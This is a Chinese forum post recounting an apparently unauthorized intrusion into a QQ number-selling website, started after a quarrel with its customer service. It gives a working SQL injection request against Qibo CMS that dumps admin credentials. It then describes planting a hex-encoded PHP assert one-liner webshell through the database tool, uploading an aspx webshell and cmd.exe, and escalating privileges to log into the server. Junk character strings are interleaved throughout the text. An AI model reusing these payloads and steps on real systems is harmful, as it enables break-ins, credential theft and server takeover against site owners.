|
1 ?* I% x4 I0 ^+ X
$ e3 G4 o' u$ f( L6 b3 |% j; u2 L6 {' Q
o+ s! g: _# v- f6 b: w! b+ s, t% W! f6 ?3 W
一、踩点寻找漏洞
8 N" n9 P6 r; _! ^- S4 `1 L9 N( X闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
6 R& Y. e" g8 {$ C3 D+ g随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
, c# r6 x: _0 |0 s先注册一个用户,记住注册时候的邮箱以uid号,
( t/ ^% ]6 ^% ^2 J
" `' H9 `9 D0 }' q# `! k; _9 n$ p
4 R! S" g7 H9 c) V4 L/ }8 w$ r然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
- D1 q( w, a7 x& c( h( y
/ z& h4 O: F" E: e' m- U- z$ W- a
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
% g! F' x0 }: R
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
; D, b% |0 H" q
1 `6 H5 P3 h9 Z6 H. V2 a: L1 B7 B4 q确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
( U' B) B% P8 c
2 V. Y# L/ t) v! X7 G f0 `! p8 @
% l' c, U1 t) R- K( J% }8 v解密进后台如图:
% E1 j- i1 U2 a& X" s
, }2 Y% _4 y2 }0 V y8 e, w8 [
9 a7 t* w2 u: D a
! U" H6 l- J' j" d& `二、后台getwebshell
4 l- Z I0 c7 o/ k* o进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
2 a! ^# ?( E: u
" g7 A# l" a3 `, g. c- b( e
* V9 A% o: e) u+ T
8 e# t) j7 q1 I/ ^4 [. \
然后点确定,添加提示
2 K8 k s9 E' m5 V6 b
3 j A" G- E" i) ]
* @, L( K+ Z* H6 u9 w4 A
7 V! q' V/ \, C* `+ r
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
9 z" h1 t6 W" S r+ P
) c- q: u! ~; r! i1 Y/ M
( Y0 a0 H, \8 x# u改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
* z" R. o9 ~6 }7 a2 j, o* A
如图:
9 k; U$ C7 u, C& X. F( ^+ K1 T
- v" N) { w) h2 I
" ^! J4 H. p: A/ |. w$ s
6 h5 K2 s& y. ^8 E, \" s
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
2 \+ Z" Y' k- o& ~9 h6 R
! _; r! | p( k8 L. R
% x) z# w( J; d; F
' o! ?! _: G# \) N. n
三、提权进服务器
+ x5 O- R3 O+ |5 P6 E
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
" e' S; j$ k* L! [: V7 \4 g6 O
u* ^8 c6 r) a4 S
" Y, v0 B' R6 T啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
" P9 v' T' _: |# I0 Y
% w# F1 G2 @% D% e
% g& N" }! V. x然后登陆服务器如图:
[2 ?2 E" p- U0 M& j1 L s! z
\9 U6 ]4 @3 v F" h% Y
# I! R+ O0 Z& R" z9 E; R( } 6 {- n5 b8 o' l* i2 ]
1 e4 y# ^ g" Q2 j: |5 C% g/ G
* w; c3 M5 _! h1 w难怪普通刀连接不上,原来是有狗。
& z+ O1 T: ?) x: q5 f( q8 b, g
" P B/ A; k3 x5 m h
# i& Z1 N0 o) [
2 o3 g& A, }5 ^7 @/ z
6 C" h! h1 I7 t/ I( k: T @0 L$ @! H+ O4 ?. K \) t
& ~! L( k: I* M+ |9 b9 m3 m
| 
发表于 2018-10-20 20:08:47
收藏
支持
反对